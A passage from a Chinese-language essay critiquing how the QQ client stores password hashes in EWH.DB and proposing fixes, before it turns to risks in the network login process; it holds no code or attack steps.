其实，腾讯稍做努力便可以改掉这个问题，要么在每个QQ Data结构后面加一个Hash验证，要么将用户的QQ号作为密钥，对口令进行加密。最简单的就是用QQ号取代MD5算法中的那个基本字串（即便那几十万个循环中用了一次），这样，自己的EWH.DB就只能自己用了，这才是数字指纹的真正用途嘛。也许你会说，这么做知道了算法还是徒劳，但是，至少可以打破现在的局面——只要会用鼠标的都可以修改EWH.DB，显得这些研究破解的同志多么没有存在的价值啊。
以上谈的这些东西总的说起来都是一些雕虫小技，估计有一半的人看到中途就睡着了，坚持下来的请跟随我进入下一个章节，如果最后还有幸存者，我希望和你交个朋友：）
谈到这里，我想，这篇文章不太适合高手拜读，如果你是高手并且很无聊地走到这里，那么，你可以休息了，走的时候别忘记关灯关门哦。
下面，我们谈谈关于网络的话题。

2、QQ网络登录时存在的问题
MD5的算法固然不错，但并不能取代传统的算法，那种可逆算法在任何时候都是必要的，特别在网络里。我们可以反证一下，如果你在注册QQ或者修改密码的时候，腾讯公司得到的是MD5 Hash，他怎么能知道你原来的密码是多少呢？他绝对不会和我们一样傻，通过暴力破解的方式得到吧。当然，腾讯公司也可以只要MD5，如果是这样，他就等于失去了一次对用户的隐私进行窥探的机会，这对于任何一个公司来说都是不可能的。
退一步说，即使有的公司宣布，为了用户利益，对用户的密码不感兴趣，但是，他还是要知道是谁采用了合法的方式登录，因此，最终都不能免俗，都必须从用户发来的网络包中提取信息来完成身份的校验，以便对上帝们发出邀请或对恶魔们进行拒绝，OK，如果魔鬼扮成上帝呢？
未完待续......